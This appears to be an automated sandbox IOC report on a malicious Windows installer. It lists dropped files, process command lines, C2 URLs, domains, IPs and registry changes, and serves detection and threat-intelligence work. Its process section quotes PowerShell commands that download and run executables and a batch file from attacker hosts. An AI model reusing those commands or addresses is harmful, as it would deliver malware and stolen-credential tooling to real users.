IOC Report
JlvRdFpwOD.exe


Files

File Path
Type
Category
Malicious
JlvRdFpwOD.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
initial sample
malicious
C:\Users\user\AppData\Local\Temp\ejfydkiwv
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\i1.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\iolo\dm\BIT1926.tmp
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe (copy)
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\ncgdcbnvvkpiwr
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\nsl17D4.tmp\INetC.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\nsl17D4.tmp\app.bat
DOS batch file, ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\u5o8.0.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\u5o8.2\UIxMarketPlugin.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\u5o8.2\relay.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\u5o8.2\run.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\u5o8.3.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\SecureClient\relay.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\ProgramData\AEGIJKEHCAKFCAKFHDAAAAECFC
SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
dropped
C:\ProgramData\AFCBFIJE
SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
dropped
C:\ProgramData\AIXACVYBSB.docx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\BKFBAECBAEGDGDHIEHIJ
SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
dropped
C:\ProgramData\CBAEHCAE
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
dropped
C:\ProgramData\DTBZGIOOSO.docx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\DTBZGIOOSO.xlsx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\EGIDAFBAEBKKEBFIJEBK
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
dropped
C:\ProgramData\GIGIYTFFYT.xlsx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\HIEHDHCFIJDBFHJJDBFHJKJDHI
SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
dropped
C:\ProgramData\HQJBRDYKDE.xlsx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\IEHCBAFIDAECBGCBFHJEBGDHDB
SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
dropped
C:\ProgramData\KATAXZVCPS.docx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\KATAXZVCPS.xlsx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0xd8d6edff, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_i1.exe_e5c0aeb6264ce24ecbda075532afc2d1a7c749d_e17d80e7_293502dd-527b-488a-bdca-7dc08537c16c\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_u5o8.0.exe_159cf91bdadc2a1c74c24bfeb554893126e946_f3a1083e_b283917a-912d-4d5e-8c3b-baefec863385\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER962B.tmp.dmp
Mini DuMP crash report, 15 streams, Thu May 2 08:42:23 2024, 0x1205a4 type
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER97C2.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER97F2.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERF523.tmp.dmp
Mini DuMP crash report, 14 streams, Thu May 2 08:42:47 2024, 0x1205a4 type
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERF5F0.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERF610.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\ProgramData\NHPKIZUUSG.docx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\NHPKIZUUSG.xlsx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\ONBQCLYSPU.xlsx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\QCFWYSKMHA.docx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\SQRKHNBNYN.docx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\UMMBDNEQBN.xlsx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\XZXHAVGRAG.docx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\ZSSZYEFYMU.docx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\freebl3.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\ProgramData\iolo technologies\logs\bootstrap.log
ASCII text, with CRLF line terminators
modified
C:\ProgramData\iolo\logs\WSComm.log
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\mozglue.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\ProgramData\msvcp140.dll
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
C:\ProgramData\nss3.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\ProgramData\softokn3.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\ProgramData\vcruntime140.dll
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Microsoft\ApplicationInsights\02b7d1436f6e86786e74c7f14b0eeb043810a2ded0b85707d2c8e2ec408053fe\weio5oj4.d3n
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MSBuild.exe.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\load[1].bat
DOS batch file, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\70ba1f3c
data
dropped
C:\Users\user\AppData\Local\Temp\879bd5de
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hcjfx3jn.c1h.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nzjjhzrj.ewa.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o5c2vlmw.r2l.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t0uskbkv.kq5.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tha5eipm.vjf.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zwvvkhuz.cde.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\iolo\dm\ioloDMLog.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\lfprexjoqqmf
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Apr 24 04:56:20 2024, mtime=Thu May 2 07:42:18 2024, atime=Wed Apr 24 04:56:20 2024, length=2469936, window=hide
dropped
C:\Users\user\AppData\Local\Temp\tmpBC50.tmp
SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
dropped
C:\Users\user\AppData\Local\Temp\u5o8.1.zip
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Local\Temp\u5o8.2\bunch.dat
data
dropped
C:\Users\user\AppData\Local\Temp\u5o8.2\whale.dbf
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BIT2AEA.tmp
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Apr 24 04:56:20 2024, mtime=Thu May 2 07:42:18 2024, atime=Wed Apr 24 04:56:20 2024, length=2469936, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\il_Plugin_v1.lnk (copy)
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Apr 24 04:56:20 2024, mtime=Thu May 2 07:42:18 2024, atime=Wed Apr 24 04:56:20 2024, length=2469936, window=hide
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
data
dropped
C:\Users\user\AppData\Roaming\SecureClient\bunch.dat
data
dropped
C:\Users\user\AppData\Roaming\SecureClient\whale.dbf
data
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
C:\Windows\appcompat\Programs\Amcache.hve
MS Windows registry file, NT/2000 or above
dropped
Chrome Cache Entry: 139
ASCII text, with very long lines (8534)
downloaded

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\JlvRdFpwOD.exe
"C:\Users\user\Desktop\JlvRdFpwOD.exe"
malicious
C:\Windows\SysWOW64\cmd.exe
"cmd" /c "C:\Users\user\AppData\Local\Temp\nsl17D4.tmp\app.bat"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/th.php?a=2836&c={CHANNEL}','stat')"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=425&c={CHANNEL}','i1.exe')"
malicious
C:\Users\user\AppData\Local\Temp\i1.exe
i1.exe /SUB=2838 /str=one
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id={SPOLO_ID}', 'i2.bat')"
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K i2.bat
malicious
C:\Users\user\AppData\Local\Temp\u5o8.0.exe
"C:\Users\user\AppData\Local\Temp\u5o8.0.exe"
malicious
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
malicious
C:\Users\user\AppData\Local\Temp\u5o8.2\run.exe
"C:\Users\user\AppData\Local\Temp\u5o8.2\run.exe"
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
malicious
C:\Users\user\AppData\Local\Temp\u5o8.3.exe
"C:\Users\user\AppData\Local\Temp\u5o8.3.exe"
malicious
C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
"C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
malicious
C:\Users\user\AppData\Local\Temp\u5o8.2\run.exe
"C:\Users\user\AppData\Local\Temp\u5o8.2\run.exe"
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2380 --field-trial-handle=2312,i,1705992732450637003,3604299843699429544,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2380 --field-trial-handle=2312,i,1705992732450637003,3604299843699429544,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7352 -s 1248
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7608 -s 2228
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
http://91.215.85.66:9000/wbinjget?q=8587D7BC4236146899B093C1B42EFE08
91.215.85.66
malicious
https://d2iv78ooxaijb6.cloudfront.net/load/th.php?a=2836&c=
unknown
malicious
http://185.172.128.150/c698e1bc8a2f5e6d.php
185.172.128.150
malicious
http://185.172.128.150/b7d0cfdb1d966bdd/vcruntime140.dll
185.172.128.150
malicious
http://185.172.128.150/b7d0cfdb1d966bdd/freebl3.dll
185.172.128.150
malicious
https://d2iv78ooxaijb6.cloudfront.net
unknown
malicious
http://185.172.128.150/b7d0cfdb1d966bdd/softokn3.dll
185.172.128.150
malicious
https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=
unknown
malicious
http://185.172.128.150/b7d0cfdb1d966bdd/msvcp140.dll
185.172.128.150
malicious
https://monitor.azure.com//.default
unknown
http://www.vmware.com/0
unknown
https://snapshot.monitor.azure.com/&
unknown
http://185.172.128.150/c698e1bc8a2f5e6d.phpIDa
unknown
http://185.172.128.228/BroomSetup.exe
185.172.128.228
http://185.172.128.150/c698e1bc8a2f5e6d.phpaDI
unknown
http://crl.microsoft
unknown
http://185.172.128.59/ISetup1.exe
185.172.128.59
http://185.172.128.150/c698e1bc8a2f5e6d.php-fulluser-l1-1-0
unknown
http://svc.iolo.com/__svc/sbv/DownloadManager.ashx.
unknown
https://g.live.com/odclientsettings/ProdV2.C:
unknown
https://scripts.sil.org/OFLhttps://indiantypefoundry.comNinad
unknown
https://www.iolo.com/company/legal/sales-policy/
unknown
http://www.indyproject.org/
unknown
http://d2iv78ooxaijb6.cloudfront.net
unknown
https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe6C:
unknown
http://185.172.128.150/b7d0cfdb1d966bdd/softokn3.dllAy
unknown
https://support.iolo.com/support/solutions/articles/44001781185?
unknown
https://g.live.com/odclientsettings/Prod.C:
unknown
https://www.iolo.com/company/legal/privacy/?
unknown
http://www.codeplex.com/CompositeWPF
unknown
https://support.iolo.com/support/solutions/articles/44001781185
unknown
https://scripts.sil.org/OFL
unknown
https://taskscheduler.codeplex.com/H
unknown
https://www.iolo.com/company/legal/sales-policy/?
unknown
https://nuget.org/nuget.exe
unknown
https://scripts.sil.org/OFLX8
unknown
https://westus2-2.in.applicationinsights.azure.com
unknown
https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=425&c=%7BCHANNEL%7D
108.138.125.52
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
142.251.40.228
https://webhooklistenersfunc.azurewebsites.net/api/lookup/constella-dark-web-alerts
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://indiantypefoundry.com
unknown
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
unknown
https://download.avira.com/download/
unknown
http://www.codeplex.com/prism#Microsoft.Practices.Prism.ViewModel
unknown
http://dejavu.sourceforge.net
unknown
http://www.mozilla.com/en-US/blocklist/
unknown
https://www.iolo.com/company/legal/privacy/
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://91.215.85.66:
unknown
https://go.micro
unknown
https://contoso.com/Icon
unknown
http://download.iolo.net/ds/4/en/images/dsUSB.imaRealDefense
unknown
http://crl.ver)
unknown
https://aka.ms/pscore6lBkq
unknown
https://rt.services.visualstudio.com/l
unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
unknown
http://gdlp01.c-wss.com/rmds/ic/universalinstaller/common/checkconnection
unknown
http://nsis.sf.net/NSIS_ErrorError
unknown
https://dc.services.visualstudio.com/
unknown
https://www.ecosia.org/newtab/
unknown
http://www.symauth.com/cps0(
unknown
https://d295fdouc92v9n.cloudfront.net/load/load.php?c=1000/silentget
unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
unknown
http://dejavu.sourceforge.nethttp://dejavu.sourceforge.netFonts
unknown
https://github.com/Pester/Pester
unknown
https://iolo.comH42652B74-0AD8-4B60-B8FD-69ED38F7666B
unknown
https://d295fdouc92v9n.cloudfront.net/
unknown
https://dc.services.visualstudio.com/f
unknown
https://profiler.monitor.azure.com/
unknown
http://185.172.128.59/syncUpd.exe
185.172.128.59
http://crl.micro
unknown
https://support.iolo.com/support/solutions/articles/44
unknown
http://www.symauth.com/rpa00
unknown
https://www.newtonsoft.com/jsonschema
unknown
https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe
169.150.236.100
http://www.info-zip.org/
unknown
http://91.215.85.66:9000t-kq
unknown
http://185.172.128.150/b7d0cfdb1d966bdd/freebl3.dllH
unknown
https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.6-
unknown
https://westus2-2.in.applicationinsights.azure.com/
unknown
https://www.iolo.com/company/legal/eula/?
unknown
http://dejavu.sourceforge.net/wiki/index.php/License
unknown
http://185.172.128.150/b7d0cfdb1d966bdd/vcruntime140.dllo
unknown
https://scripts.sil.org/OFLThis
unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
unknown
https://github.com/itfoundry/Poppins)&&&&z
unknown
https://github.com/itfoundry/Poppins)
unknown
https://snapshot.monitor.azure.com/
unknown
https://github.com/itfoundry/Poppins)&&&&v
unknown
http://ocsp.sectigo.com0
unknown
https://contoso.com/License
unknown
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGOOjzbEGIjAjxm_uq7eJ4K6LnrN39eNjI0R2pOuq0UVNCdm4L6ull4GMPSjbz1Kky3lc4ucWFkgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
142.251.40.228
https://d295fdouc92v9n.cloudfront.net/load/load.php?c=1000=z)8
unknown
https://www.iolo.com/company/legal/eula/
unknown
http://185.172.128.228/ping.php?substr=one
185.172.128.228
https://www.newtonsoft.com/json
unknown
https://westus2-2.in.applicationinsights.azure.com/v2/track
unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
unknown

Domains

Name
IP
Malicious
download.iolo.net
unknown
malicious
d295fdouc92v9n.cloudfront.net
108.138.113.167
d2iv78ooxaijb6.cloudfront.net
108.138.125.52
www.google.com
142.251.40.228
iolo0.b-cdn.net
169.150.236.100
note.padd.cn.com
176.97.76.106
svc.iolo.com
20.157.87.45
fp2e7a.wpc.phicdn.net
192.229.211.108
westus2-2.in.applicationinsights.azure.com
unknown

IPs

IP
Domain
Country
Malicious
185.172.128.90
unknown
Russian Federation
malicious
185.172.128.150
unknown
Russian Federation
malicious
192.168.2.4
unknown
unknown
malicious
91.215.85.66
unknown
Russian Federation
malicious
108.138.125.52
d2iv78ooxaijb6.cloudfront.net
United States
176.97.76.106
note.padd.cn.com
United Kingdom
142.251.40.228
www.google.com
United States
185.172.128.59
unknown
Russian Federation
169.150.236.100
iolo0.b-cdn.net
United States
142.251.32.100
unknown
United States
108.138.113.167
d295fdouc92v9n.cloudfront.net
United States
185.172.128.228
unknown
Russian Federation
20.157.87.45
svc.iolo.com
United States
239.255.255.250
unknown
Reserved
127.0.0.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\BroomCleaner
Installed
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{E88DCCE0-B7B3-11D1-A9F0-00AA0060FA31} {000214E6-0000-0000-C000-000000000046} 0xFFFF
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\Enum
Implementing
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFiles0000
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFilesHash
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications
MaxSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications
Retention
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications\System Mechanic
EventMessageFile
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications\System Mechanic
TypesSupported
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications\Service Manager
EventMessageFile
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications\Service Manager
TypesSupported
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications\ActiveCare
EventMessageFile
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications\ActiveCare
TypesSupported
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications\System Guard
EventMessageFile
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications\System Guard
TypesSupported
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications\Launch Manager
EventMessageFile
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications\Launch Manager
TypesSupported
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications\Tune-Up Definitions
EventMessageFile
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications\Tune-Up Definitions
TypesSupported
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications\Governor
EventMessageFile
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications\Governor
TypesSupported
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications\Memory Mechanic
EventMessageFile
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications\Memory Mechanic
TypesSupported
\REGISTRY\A\{c2a6d73b-55b4-8150-9fea-67c36b9f43b3}\Root\InventoryApplicationFile\i1.exe|64d9c48bab2b9d58
ProgramId
